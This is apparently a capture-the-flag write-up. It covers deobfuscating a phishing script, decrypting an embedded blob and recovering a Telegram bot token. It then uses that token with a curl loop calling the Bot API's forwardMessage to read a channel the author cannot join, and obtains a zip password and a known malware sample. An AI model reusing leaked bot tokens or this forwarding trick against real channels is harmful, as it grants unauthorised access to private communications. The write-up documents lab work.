You can already see that the first string is most likely the ciphertext, the second the key and the third the IV.
Cipher
Initialization Vector
Using these strings to decrypt the blob was successful in CyberChef.
Decrypted Blob
I beautified the start of the original script and began deobfuscating it before inserting the decrypted part.
Beautified Script Start
I suspected that the function _$_9b39 only generates the string constants used by the code inside the AES-encrypted blob. Duplicate semicolons can be removed, as they have no function.
I wrote a test script that outputs the results for indices 0-5 of the array returned by _$_9b39.
Deobfuscation Results
Given these strings, I replaced the entire CryptoJS cipher part with the decrypted version from CyberChef and beautified it. It contains more of these string-generating functions, which can be replaced the same way.
Function Outputs to Replace
Again, I wrote a test script for each of these functions, evaluated their outputs and replaced the call sites to make the functions obsolete:
Function Test Script
Function Test Script Results
"outputgen[12] = log" is never used, but I replaced the other occurrences and removed the function.
And another one, this time with more automation:
Next Test Script
The results were promising:
Script Results
"outgen[21] = log" is again never used.
This function was the last one that still looked heavily obfuscated. Unravelling it was simple with a test script again.
Test Script
0p3r4t10n_4PT_Un10n was the resulting string. This, however, was not the flag. I moved on to try to reach the Telegram chat that the messages are sent to.
Now this function is interesting. It takes a secret key, which is later defined as the local part of the e-mail address (everything before the @) that you type in on the website.
Remaining Dubious Function
Having understood the decryption function, the ciphertext and key could be used to get the result:
Decryption Result
This turned out to contain a Telegram bot token: 7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc
Exploring the Telegram API
The value of descriptionField is parsed as a base-10 integer and passed to the function as its second argument. input2 is then used as the chat_id in the Telegram link. The final link (with input2 = 10 as an illustration) looks like this. Since the value comes from the description field, we do not know it. We have the bot token though, so we might be able to query the Telegram Bot API and find the chats the bot has seen. The getUpdates endpoint returns the updates the bot has not yet acknowledged (it returns nothing while a webhook is configured), including the chats they came from:
This is the chatID of the "Operation Eldoria" channel: -1002496072246
This is the forward origin of the invite: -1002496072246
The bot whose token we have, bot7767830636, is called OperationEldoriaBot. An invite link can be found, but it seems to be invalid: https://t.me/+_eYUKZwn-p45OGNk
Invalid Invite Link
Requesting the Operation Eldoria chat directly is not possible due to missing access rights.
No Direct Access To Telegram Chat
After testing and research, we found that you can start a chat with the bot and use its forwardMessage method to forward messages to your own chat ID. This way we could forward the messages of the OperationEldoria channel to our private devices, even though we could not join the channel directly.
Telegram Bot Access
I wrote this script (see the loop at the end of the post) to forward the first 15 messages to my Telegram chat:
Forwarded Telegram Messages
We retrieved a zip file and its password: dr4g0nsh34rtb3l0ngst0m4l4k4r
Malware Analysis
The zip file could be downloaded and extracted with the password. Its content was a single file, "Brave.exe".
Judging by the file size, I suspected that the program is a modified version of the Brave browser, since it seemed too large for just a hacking tool.
Opening the file in AvaloniaILSpy did not work. I started a Windows VM to get more options for Windows-native analysis. Submitting the file to VirusTotal showed that it was already known and detected as malware.
VirusTotal Malware Detection
Unfortunately, we assumed the malware would be a dead end, since it was already known to VirusTotal and the analysis results contained nothing interesting. We went back to querying the Telegram API instead. It was possible to list the administrators of the OperationEldoria group and get some more information on other users, but that did not help us.
I also wanted to try dynamic analysis in the Windows VM, but Windows, of course, decided that its network connection would not work.
After the CTF, I saw that you only had to run the sample and investigate the requests the malware makes in Wireshark.
# Forward message IDs 1-15 from the channel into my own chat; <redacted> is my chat ID.
for i in {1..15}; do curl -s "https://api.telegram.org/bot7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc/forwardMessage?chat_id=<redacted>&from_chat_id=-1002496072246&message_id=$i" | jq >> messages.txt; done
strings Brave.exe | wc -l
34667
file Brave.exe
Brave.exe: PE32+ executable for MS Windows 6.00 (console), x86-64, 8 sections